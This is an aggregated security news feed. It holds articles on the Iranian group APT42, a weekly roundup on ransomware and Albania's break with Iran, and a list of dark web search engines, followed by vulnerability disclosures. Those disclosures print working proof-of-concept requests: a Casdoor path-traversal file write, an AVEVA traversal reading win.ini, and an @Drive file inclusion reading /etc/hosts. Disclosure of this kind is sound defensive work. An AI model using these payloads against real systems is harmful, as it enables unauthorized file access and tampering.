A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015.
Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (

A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015.

Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (IRGC), not to mention shares partial overlaps with another cluster called APT35, which is also known as Charming Kitten, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda.

APT42 has exhibited a propensity to strike various industries such as non-profits, education, governments, healthcare, legal, manufacturing, media, and pharmaceuticals spanning at least 14 countries, including in Australia, Europe, the Middle East, and the U.S.

Intrusions aimed at the pharmaceutical sector are also notable for the fact that they commenced at the onset of the COVID-19 pandemic in March 2020, indicating the threat actor's ability to swiftly modify its campaigns in order to meet its operational priorities.

"APT42 uses highly targeted spear-phishing and social engineering techniques designed to build trust and rapport with their victims in order to access their personal or corporate email accounts or to install Android malware on their mobile devices," Mandiant said in a report.

The goal is to exploit the fraudulent trust relationships to steal credentials, enabling the threat actor to leverage the access to conduct follow-on compromises of corporate networks to gather sensitive data and use the breached accounts to phish additional victims.

Attack chains involve a mix of highly targeted spear-phishing messages aimed at individuals and organizations of strategic interest to Iran. They are also conceived with the intent to build trust with former government officials, journalists, policymakers, and the Iranian diaspora abroad in hopes of distributing malware.

Outside of using hacked email accounts associated with think tanks to target researchers and other academic organizations, APT42 is often known to impersonate journalists and other professionals to engage with the victims for several days or even weeks before sending a malicious link.

In one attack observed in May 2017, the group targeted members of an Iranian opposition group operating from Europe and North America with email messages that contained links to rogue Google Books pages, which redirected victims to sign-in pages designed to siphon credentials and two-factor authentication codes.

Surveillance operations involve the distribution of Android malware such as VINETHORN and PINEFLOWER via text messages that are capable of recording audio and phone calls, extracting multimedia content and SMSes, and tracking geolocations. A VINETHORN payload spotted between April and October 2021 masqueraded as a VPN app called SaferVPN.

"The use of Android malware to target individuals of interest to the Iranian government provides APT42 with a productive method of obtaining sensitive information on targets, including movement, contacts, and personal information," the researchers noted.

The group is also said to use a raft of lightweight Windows malware from time to time – a PowerShell toehold backdoor named TAMECAT, a VBA-based macro dropper dubbed TABBYCAT, and a reverse shell macro known as VBREVSHELL – to augment their credential harvesting and espionage activities.

APT42's links to APT35 stems from links to an uncategorized threat cluster tracked as UNC2448, which Microsoft (DEV-0270) and Secureworks (Cobalt Mirage) disclosed as a Phosphorus subgroup carrying out ransomware attacks for financial gain using BitLocker.

Mandiant's analysis further lends credence to Microsoft's findings that DEV-0270/UNC2448 is operated by a front company that uses two public aliases, namely Secnerd and Lifeweb, both of which are connected to Najee Technology Hooshmand.

That having said, it's suspected the two adversarial collectives, despite their affiliation with IRGC, originate from disparate missions based on differences in targeting patterns and the tactics employed.

A key point of distinction is that while APT35 is oriented towards long-term, resource-intensive operations targeting different industry verticals in the U.S. and the Middle East, APT42's activities focus on individuals and entities for "domestic politics, foreign policy, and regime stability purposes."

"The group has displayed its ability to rapidly alter its operational focus as Iran's priorities change over time with evolving domestic and geopolitical conditions," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Iranian APT42 Launched Over 30 Espionage Attacks Against Activists and Dissidents

Plus: Albania cuts ties with Iran, claims of a TikTok data breach that didn’t happen, and much more.

Russia’s full-scale invasion of Ukraine hasn’t gone to Vladimir Putin’s plan: Its troops have suffered devastating losses, failed to capture key Ukrainian cities, and been pushed back toward Russia. However, domestically, the Kremlin has succeeded in further suppressing its citizens—including blocking independent news media and other access to impartial information. Now, a new tool lets people in Russia access websites the Kremlin has blocked, giving them access to news that’s not dictated by the state’s propaganda machine.

The Biden administration is reportedly readying itself to take action against TikTok, following years of suggestions that the Chinese-owned app is a threat to national security. This week we looked at the problem with TikTok: that lawmakers can’t decide on what threat, if any, the app really poses.

Elsewhere, Apple revealed the new iPhone 14. Alongside this, it announced that iOS 16 will be available for people to download from September 12. This means Apple’s new passkey technology, which eliminates the need for passwords, will be available to millions of people. Here’s everything you need to know about Apple’s passkeys.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

With more than 400,000 students ranging from kindergarten to 12th grade, the Los Angeles Unified School District is one of the largest school districts in the US. On September 6, the district became the latest to be targeted by ransomware. In a statement published online, the district’s administrators said it had detected “unusual activity” within its networks, saying it had been targeted by ransomware; despite the attack, students have been able to attend school.

The attack prompted a large response from officials, with the FBI and Department of Homeland Security assisting local law enforcement. Students and staff have lost access to their email systems, local reports say. It is also unclear, according to reports, whether students' information, including disciplinary records and assessments, was accessed by the attackers. The school district says that students and employees must reset their passwords to their school accounts while physically attending school district sites. “The District has staggered password reset access to minimize congestion from simultaneous users accessing the website,” officials said in a statement.

The Vice Society ransomware group has claimed responsibility for the attack. Following the incident, the Cybersecurity and Infrastructure Security Agency (CISA) and other partners published a warning about Vice Society, saying it has been “disproportionately targeting the education sector.” The Los Angeles attack is the latest against educational institutions: According to a report by security firm Sophos based on a survey of 499 respondents, 56 percent of lower education and 64 percent of higher education organizations were hit by ransomware in the past year, a “considerable increase” from the previous year.

Back in July, the government websites of Albania were knocked offline. Last month, security company Mandiant researchers revealed that Iranian hackers, working on behalf of Tehran, were likely to be behind the attacks, which took out public services for hours. “These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance,” John Hultquist, Mandiant’s vice president of intelligence, told WIRED when it published its findings.

This week, the government of Albanian took the unprecedented step to cut diplomatic ties with Iran, accusing it of launching the cyberattack. The country also ordered Iranian embassy staff to leave the country. “The deep investigation put at our disposal undeniable evidence that the cyberattack against our country was orchestrated and sponsored by the Islamic Republic of Iran which had involved four groups for the attack on Albania,” prime minister Edi Rama said in a statement. (Microsoft conducted the investigation for the Albanian government.)

Hackers Target Los Angeles School District With Ransomware

By Waqas
When it comes to the best dark web search engines, first and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.
This is a post from HackRead.com Read the original post: 8 Online Best Dark Web Search Engines for Tor Browser (2022)

The **Dark Web**, also known as the Dark Net, is a part of the Internet that is not accessible through standard web browsers. It can only be accessed through specialized software such as the Tor browser.

The Dark Web is often associated with illegal activity such as cybercrime including drug dealing, child abuse, and terrorism. However, there are also many legitimate uses for the Dark Web, such as anonymity for whistleblowers and journalists. **Facebook** and **Twitter** also have their dark web domains. (_If you didn’t know now you know_).

Despite its reputation, the Dark Web is a relatively small part of the overall Internet. It is estimated that only around 4% of all websites are accessible through the **Tor browser**.

**What is a Tor Browser?**

The Tor Browser is a free and open-source web browser that is based on the Mozilla Firefox web browser. The Tor Browser is designed to protect your privacy and anonymity when using the internet.

The Tor Browser routes your internet traffic through a network of servers, making it difficult for anyone to track your online activity. The Tor Browser is available for Windows, macOS, and Linux.

Tor is short for “The Onion Router”. The Tor network was **originally developed** by the US Naval Research Laboratory as a way to securely communicate between government agencies.

The Tor network consists of a series of volunteer-run servers that route internet traffic through a series of encrypted tunnels. This makes it difficult for anyone to track your online activity or identify your location.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**You May Also Like**

1.  **What Are Dark Web Search Engines and How to Find Them?**
2.  **Brave Browser enters dark web with its own Tor Onion service**
3.  **Online Anonymity – How to Keep Yourself Safe and Unidentified**
4.  **Why torrenting on Elon Musk’s Starlink Internet is not a good idea?**
5.  **USA Wants Russians to Share Secret Info with the CIA on the Dark Web**

**Best Dark Web Search Engines for Tor Browser**

When it comes to the best dark web search engines, there are a few things to keep in mind. First and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.

Additionally, you want a search engine that is fast and efficient, so you can get the information you need without any delays. Assuming those are your priorities, here are 8 dark web search engines to use with Tor Browser:

**1\. Ahmia.fi**

Ahmia.fi is a search engine designed to allow access to the so-called “dark web” or “dark net” – a hidden part of the internet that can only be accessed using specific software, such as the Tor browser.

Ahmia is one of a small number of dark web search engines that allow users to access the dark web, and it has been praised for making this otherwise hidden part of the internet more accessible.

However, Ahmia also has a policy against any “abuse material,” something different from many other dark web search engines that also index websites featuring child sexual abuse content.

Ahmia is available on the **surface web** and supports searches on the i2p network as well. You can visit Ahmia’s .Onion domain **here**. 

Home page of Ahmia dark web search engine

**2\. Haystak**

Haystak is one of the dark web search engines designed for the Tor network. The search engine claims to have indexed over 1.5 billion pages which includes more than 260,000 websites, Haystak indeed would stand out to be a resourceful engine on the list.

Haystak also has a paid version which offers a number of additional features such as searching using regular expressions, browsing now-defunct onion sites, and accessing their API. You can visit Haystak by following its .Onion link **here**. 

Home page of Haystak dark web search engine

**3\. The Hidden Wiki**

The Hidden Wiki is a dark web directory that can only be accessed using the Tor network. The site contains links to a variety of different websites. The Hidden Wiki is a valuable resource for those who wish to explore the dark web, as it provides a safe and easy way to access a variety of different sites.

A **surface web version** is also available. You can visit The Hidden Wiki by following its .Onion link **here**. 

Home page of The Hidden Wiki

**4\. Torch**

Torch is one of those dark web search engines that have lasted for long enough (since 1996). Torch, like other search engines, crawls these addresses and indexes their content, making it searchable for users.

However, speaking based on personal experience, its search results are not impressive. For instance, I wanted to know Twitter’s onion URL, a very simple piece of information. Yet, it reported everything but that showing how far these search engines have to go in order to improve.

On the other hand, it is fast and can come in handy regardless. Nevertheless, you can visit Torch by following its .Onion link **here**. 

Home page of Torch dark web search engine

**5\. Recon**

This particular search engine was built by Hugbunt3r, a prominent member of the popular **Dread service** on the dark web. It aims to serve as a database through which users can search for products from different vendors in different marketplaces on the dark web.

Individual profile viewing options for vendors & marketplaces are also available including details like ratings, mirror links, number of listings, and uptime percentage. You can visit Recon by following its .Onion link **here** and just in case you manage to bypass its DDoS protection captcha page let us know in the comment section because we failed to do so. (_Good luck_).

Home page of Recon dark web search engine

**6\. DuckDuckGo**

Did you know DuckDuckGo is available on the dark web and they have their .Onion domain as well? Yes, but it only displays results from the surface web even if used on the Tor browser.

Yet, when it comes to anonymity DuckDuckGo has a proven track record which is why the privacy advocate team behind DDG is known as a long-time foe of Google. You can visit DuckDuckGo by visiting its .Onion link **here**. 

Home page of DuckDuckGo dark web search engine

**7\. Onion Search**

Onion Search is a search engine for the dark web that enables users to find and access Onion sites. The site is designed to be used with the Tor browser, which allows users to browse the internet anonymously.

A look at its about page reveals that the search engine is being operated from France as the search engine acknowledges to be “fully compliant with the Law of France.” Another noteworthy option on the search engines is that one can report child abuse content to the administrator who vows to remove it.

Onion Search is available on the **clear net** as well as on the dark web through its **.Onion domain**.

Home page of Onion Search dark web search engine

**8\. Deep Search**

Deep Search is a search engine for the dark web. It is designed to index and search onionspace, the hidden services portion of the Tor network. DeepSearch is open source and available for anyone to use.

According to my personal experience, Deep Search seems to provide pretty accurate and useful results, unlike others who spam users with spam links. Another noteworthy feature of Deep Search is that it provides a list of marketplaces, exchanges, and websites involved in scamming users.

If you want to give Deep Search a try check their .Onion domain **here**.

Home page of Deep Search dark web search engine

To conclude, you may also find the links of other dark web search engines but these happen to be the ones that stand out the most.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**What NOT TO DO on Dark Web?**

The dark web is a place full of potential danger. There are many things that can go wrong when visiting the dark web, and it’s important to be aware of them before you go. Here are some things to avoid doing on the dark web:

*   Don’t click on any links unless you know where they lead. Many links on the dark web lead to illegal drug markets, child abuse content, malicious sites, or downloads.

*   Never enter your personal information into any form on the dark web. This includes your name, address, email, and phone number.

*   Don’t download anything from the dark web unless you trust the source. There are many viruses and malware lurking on the dark web, waiting to be downloaded by unsuspecting users.

*   Never ever download illegal and abusive content that includes content against children, torture, blackmail, and other malicious content.

**Use a VPN**

Although the Tor browser protects your online privacy using a **reliable VPN** at the same time is a plus. A VPN will encrypt your traffic and hide your IP address, making it much harder for someone to track you down. Additionally, if you are on a clear net, a VPN will give you access to blocked websites and content.

1.  **Tor Anonymity: Things NOT To Do While Using Tor**
2.  **CISA Publishes List of Free Cybersecurity Tools and Services**
3.  **New Underactor tool reveals pixelated text to expose sensitive data**
4.  **Download Kali Linux 2022.1 with new tools and wider SSH compatibility**
5.  **Cybersecurity, Big Data, Automation Tools: What Marketers Need To Know**

8 Online Best Dark Web Search Engines for Tor Browser (2022)

Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

Arq Backup 7.19.5.0 and below stores backup encryption passwords using reversible encryption. This issue allows attackers with administrative privileges to recover cleartext passwords.

**CVE-2022-36617 Report**

**From:**  
**To:** ██████████  
**Product:** Arq Backup  
**Date:** July 15th, 2022  
**Date of public disclosure:** September 7th, 2022  
**Attachments:**  
 arqbackup.zip

**09/07/2019 Author's Note:**  
As of September 7th, 2022, CVE-2022-36617 has been patched with the release of Arq Backup 7.19.10.0 for Windows / 7.19.3 for macOS.

Hi Stefan,

First off, let me just say that I really like Arq Backup. I've been using it on my laptop for over a year now, and it fills its niche perfectly.

The vulnerability I discovered is that backup encryption passwords are stored locally in a reversibly encrypted way, which would allow malware running locally with administrative privileges to steal the user's password(s). I've included a proof of concept demo script of this in the attached zip file (password is "█████████").

Thankfully, this is pretty easy to fix. As Arq already derives the backup encryption key from the user's password with a slow key derivation function, it does not have to store the user's password—only the derived encryption key.

Note that is is not a problem to store other types of secrets (e.g. OAuth refresh tokens, etc.) in a reversibly encrypted way as they are not reused. In contrast, users will reuse passwords elsewhere, so compromise by an attacker grants access beyond that legitimately needed for Arq's normal operation.

I will be following the industry standard of responsible disclosure with this vulnerability, as elucidated in Google's policy. Your deadline is (July 14 + 90 days = ) October 12th, 2022.

Please notify me when you have successfully reproduced the vulnerability using my proof of concept, or if you have trouble doing so. Additionally, feel free to email me about any other matter in connection with my report; I'm here to help.

Thank you for your time.

Kind regards,  
Sam Haskins

**Timeline:**  
(America/Toronto time zone)  
**July 11th, 2022:** Vulnerability discovered.  
**July 13th, 2022:** Initial contact made with vendor via support email.  
**July 15th, 2022:** Report submitted to vendor.  
**July 20th, 2022:** Contacted by vendor president.  
**July 20-28, 2022:** Vulnerability acknowledged by vendor.  
**July 21st, 2022:** CVE requested.  
**August 10th, 2022:** Notified by vendor that a patch was developed.  
**September 2nd, 2022:** Assigned CVE-2022-36617.  
**September 6th, 2022:** Patched version released.  
**September 7th, 2022:** Report published.  
**October 12th, 2022:** 90 days public disclosure deadline.

CVE-2022-36617: CVE-2022-36617

InTouch Access Anywhere Secure Gateway versions 2020 R2 and below suffer from a path traversal vulnerability.

    Title:======AVEVA InTouch Access Anywhere Secure Gateway - Path TraversalAuthor:=======Jens Regel, CRISEC IT-SecurityCVE:====CVE-2022-23854Advisory:=========https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal/Timeline:=========25.06.2021 Vulnerability discovered25.06.2021 Send details to custfirstsupport@aveva.com21.09.2021 Vendor response, fix is available until Q1/202225.09.2021 Vendor released Tech Alert TA00002233506.09.2022 Public disclosureVendor:=======AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).Affected Products:==================InTouch Access Anywhere Secure Gateway versions 2020 R2 and olderDetails:========A security vulnerability exists in InTouch Access Anywhere Secure Gateway versions 2020 R2 and older. This is a Relative Path Traversal vulnerability which allows an unauthenticated user with network access to the Secure Gateway to read files on the system outside of the Secure Gateway web server.Proof of Concept:=================GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1HTTP/1.1 200 OKServer: EricomSecureGateway/8.4.0.26844.*(..); for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1Fix:====InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) HotfixInTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix

InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal

@Drive version 2.8 suffers from a local file inclusion vulnerability.

    # Exploit Title: @Drive 2.8  Local File inclusion# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://evolutive.co/# Software Link: https://apps.apple.com/us/app/drive/id578982909# Version: 2.8# Tested on: iPhone ios 15.6GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.187User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept: */*Referer: http://192.168.1.187/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close--------HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: 213Accept-Ranges: bytesDate: Thu, 08 Sep 2022 14:26:16 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

@Drive 2.8 Local File Inclusion

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in All in One SEO plugin <= 4.2.3.1 at WordPress.

CVE-2022-38093: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic

Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team wpForo Forum plugin <= 2.0.5 at WordPress.

CVE-2022-38144: wpForo Forum

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Apasionados Export Post Info plugin <= 1.1.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file, allowing to have an overview of the topics and titles published in the blog.

We created this plugin because we generate large amounts of content for blogs and we often need to lookup the topics that were already covered before in a blog. As we don’t want to export the titles by hand we developed this plugin.

**What can I do with this plugin?**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file that can be imported into Excel.

**What ideas is this plugin based on?**

We were searching for a plugin that allowed us to export the post titles and found Export All URLs. Unfortunately the plugin didn’t export the publish date, status and word count, so we decided to create a new plugin with this information and the the ability to translate it.

**System requirements**

PHP version 5.5 or greater.

**Export Post Info to CSV Plugin in your Language!**

This first release is avaliable in English and Spanish. In the “languages” folder we have included the necessarry files to translate this plugin.

If you would like the plugin in your language and you’re good at translating, please drop us a line at Contact us.

**Further Reading**

You can access the description of the plugin in Spanish at: Export Post Info to CSV en español.

**Contact**

For further information please send us an email.

**Translating WordPress Plugins**

The steps involved in translating a plugin are:

1.  Run a tool over the code to produce a POT file (Portable Object Template), simply a list of all localizable text. Our plugins allready havae this POT file in the /languages/ folder.
2.  Use a plain text editor or a special localization tool to generate a translation for each piece of text. This produces a PO file (Portable Object). The only difference between a POT and PO file is that the PO file contains translations.
3.  Compile the PO file to produce a MO file (Machine Object), which can then be used in the theme or plugin.

In order to translate a plugin you will need a special software tool like poEdit, which is a cross-platform graphical tool that is available for Windows, Linux, and Mac OS X.

The naming of your PO and MO files is very important and must match the desired locale. The naming convention is: language_COUNTRY.po and plugins have an additional naming convention whereby the plugin name is added to the filename: pluginname-fr_FR.po

That is, the plugin name name must be the language code followed by an underscore, followed by a code for the country (in uppercase). If the encoding of the file is not UTF-8 then the encoding must be specified.

For example:

*   en\_US � US English
*   en\_UK � UK English
*   es\_ES � Spanish from Spain
*   fr\_FR � French from France
*   zh\_CN � Simplified Chinese

A list of language codes can be found here, and country codes can be found here. A full list of encoding names can also be found at IANA.

**Screenshots**

**Installation**

1.  First you will have to upload the plugin to the /wp-content/plugins/ folder.
2.  Then activate the plugin in the plugin panel.
3.  Go to SETTINGS / EXPORT POST INFO.
4.  Save a random string to make it harder for somebody to access your exported data.
5.  Download your CSV file.

**FAQ**

**Why did you make this plugin?**

We couldn’t find a plugin that would give us the functionality we were looking for:  
1) Export publish date.  
2) Export word count.  
3) Easy translation of the plugin into other languages. So far English and Spanish translations are included.

**Why do I have to setup a random string for the name of the export CSV file?**

Other plugins always export the file with the same name and in the same folder so it’s easy to access this file. We don’t want that this file can be easily found, so we decided to let you setup a random string to make the file name harder to guess.

**Does Export Post Info make changes to the database?**

Yes. It created an entry in the options table where the random string is stored.

**How can I check out if the plugin works for me?**

Install and activate. Go to settings / Export Post Info. Save random string. And download CSV file.

**How can I remove Export Post Info to CSV?**

You can simply activate, deactivate or delete it in your plugin management section.

**Which PHP version do I need?**

This plugin has been tested and works with PHP versions 5.5 and greater. WordPress itself recommends using PHP version 7.3 or greater. If you’re using a PHP version lower than 5.5 please upgrade your PHP version or contact your Server administrator.

**Are there any known incompatibilities?**

Yes. On a multi-language site the export will not work correctly.

**Is this plugin compatible with WPML**

Yes, but only the posts of the main language are exported. Post in secondary languages are not exported at this moment. We are working on this because we would like to have this feature but for us it isn’t easy to code.

**Are there any server requirements?**

Yes. The plugin requires a PHP version 5.5 or higher and we recommend using PHP version 7.3 or higher.

**Do you make use of Export Post Info to CSV yourself?**

Of course we do. That’s why we created it. 😉

**Reviews**

From uploading the plugin to downloading the CSV file took about 15 seconds! Just perfect - thank you!

This plugin exported exactly what I needed, and it did it quickly and painlessly. Thanks very much to the devs!

Time saver, works just fine

Super plugin, très simple à utiliser. Merci !

Thank you so much for this amazing little plugin that did exactly what I needed. Saved me hours of work in creating a spreadsheet with all my posts so I can create an optimization checklist. The other popular export all posts plugin only exports the post title, url and category. Without the date and other fields, I would have to go in and manually add that data. Export Post Info (this plugin) did all of it perfectly. Keep up the great work!

October 11, 2018

Not sure why this plug in has no reviews. Did for me EXACTLY what I needed even though it is two years old. Muchas Gracias

Read all 6 reviews

**Contributors & Developers**

“Export Post Info” is open source software. The following people have contributed to this plugin.

Contributors

*    apasionados

**Changelog****1.2.0 (06/Sep/2022)**

*   Security update: Please update your plugin. We escaped data to increase your security.
*   Corrected PHP notices when debug was active.

**1.1.0 (25/Aug/2019)**

*   Now posts with status published, future and private are exported. Until now only posts with status published were exported.
*   Added post status column to the export file.
*   PHP version must be 5.6 or higher. Recommended PHP version: 7.3.

**1.0.4 (08/Abr/2017)**

*   Cleaned up code + Changed functions name to be unique and avoid conflicts with other plugins or themes.

**1.0.3 (07/Abr/2017)**

*   Added check for PHP version when activating the plugin. PHP version must be 5.5 o greater.

**1.0.2 (07/Abr/2017)**

*   Solved error in Word Count with words containing UTF-8 characters.

**1.0.1 (07/Abr/2017)**

*   Word count would not count all words of a post if a tag was present.

**1.0.0 (07/Abr/2017)**

*   First official release.

Tag

#mac